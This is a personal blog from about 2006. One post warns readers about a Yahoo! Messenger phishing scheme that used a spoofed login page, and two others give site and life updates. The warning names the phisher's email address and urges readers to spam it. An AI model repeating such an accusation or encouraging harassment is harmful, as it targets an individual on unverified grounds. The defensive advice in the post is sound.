Phishing Warning

Yahoo! accounts are being cracked … with your permission.

I’ve just received two attempted attacks of phishing from two of my bloggermates in my Yahoo! Messenger contact list. I guess their accounts are being hacked the time I’ve received those messages, so I want to warn those of you who want to protect your accounts.

For those who do not know, phishing literally means fishing [for passwords], as the letter f is usually replaced by ph in 13375p34k. Another definition could be password harvesting or fishing

There are many methods of phishing attacks, usually through email that, most probably, directly goes to your spam directory [if you have any]. But ones through YM or any other IM accounts that really look like your friends are referring to you to go to are somehow really mind-controlling.

The method I’ve encountered used a spoof of the Yahoo! Photos Web site inside a Yahoo! Geocities Web page requiring you to sign in with your username and password in the attempt to trick you that your friends’ photos are posted post-login. Please take note that Yahoo! Geocities Web pages are user-controlled, meaning other people just made up that Web page.

The two URIs that was given to me was:

Apparently, those two sites that were IMed to me were already reported and were taken down. Some may still be out there, [or are currently being made] so please watch out still.

Note: Do NOT enter your login details there.

If you take a look at both the main frames’ source pages (the frames with the sign in page displayed), you will see that the form input will go to a mailform (http://www2.fiberbit.net/form/mailto.cgi) with the same email address input of smoke.beer@gmail.com. (Now, spam that bastard!) It just means that your login information will go to his GMail inbox.

The primary solutions for this is within you. You should basically:

  • Never trust login forms inside a frame of user-controlled Web page.
  • Try to login directly from the site, with secure (HTTPS) connection if possible. (e.g., Yahoo! Login, Google Accounts)
  • Never trust friends’ URI referrals unless you really know the site or have checked for security flaws/issues.

I know I haven’t fully discussed what could be done to prevent such intrusions to your accounts, you might even want to change your passwords regularly. Just remember to be aware of such possibilities when visiting untrusted Web sites. Or else, you may be giving them permission to hack you.

More about Phishing:

Fast Pace in Slow Motion

I have a new layout, everybody. Obviously.

I have a new layout, everybody. Obviously. I hope this one wouldn’t turn out dull like the second version. I have a reason for that static title, maybe I’ll tell you a little later. I’ve done this for four weeks. Yes, four weeks! I got so busy with many things but fortunately, one [this] is finished. Now, I have more time for the others.

This is somehow broken in Internet Explorer. And, I am in no mood for hacking CSS yet again for that pesky browser. Get Firefox! I’ve been telling you for years! The upcoming Windows IE7, which is already downloadable in Beta, is still no match for it—at least for me.

There are a few somethings still lacking from this Web site. Just as a checklist, it includes:

Maybe I’d just post the story behind the title in the Site Information page. I really can’t think right and write right right now. See? 😆

So much work, so little time

One word: über-busy.

One word: über-busy.

I’ve just realized having so many dreams and interests could really stress a person out—well, at least for me. Well, after two weeks of unannounced hiatus, I could finally tell you some news.

  1. I’ve got the Head position in the Web & Technical Committee of the Engineering Student Council. Wish me good luck on this, guys. It’s so much work I haven’t imagined. I’ve only applied for the Assistant Head position, but after two chosen candidates [for the Head] declined, they picked me. Many projects to come. 🙂
  2. I’ve got accepted to work on XHTMLized. Current project: none. I’ve got to finish ESC work first. 😀
  3. My Princess got a blog! And, I write here, too. Please read: Mixed to Perfection. Thank you! Shoutout: I love you, Princess!
  4. My interest in spreading Web standards could possibly be official. Though up to now it still isn’t, I’ve already told Molly that I’m interested in joining the International Liason Group of The Web Standards Project. I hope other Filipinos come and join. This would be a great opportunity for everyone who’s into standards. 🙂

I know I am forgetting something. Haha! It would just have to be on the next entry. I have to start making my project proposals and the projects themselves. Until next time!

Raindrops on my car window. North Luzon Expressway, 6 May 2006. Oh yes! I remember: I’ve already gone out swimming with the Tan Clan (my mother’s side of the family). I’ve got only a handful of photos because it was so much fun being in water after so many days of extreme heat exhaustion. Ironically, it rained so heavy the afternoon we were coming home from the province. *sweatdrop*

BTW, I’ve finished my upcoming layout about a week ago. It’s the content that it is lacking—about eight user pages are still unfinished, but the WordPress layout is done. I don’t want to activate it just yet because I think I have the tendency not to continue its development if I implement the design so early. Well, I may ask you though: “Finish it first!” or “I want the new design now!”? 😛

Back to work, now. One by one by one by one … 🙂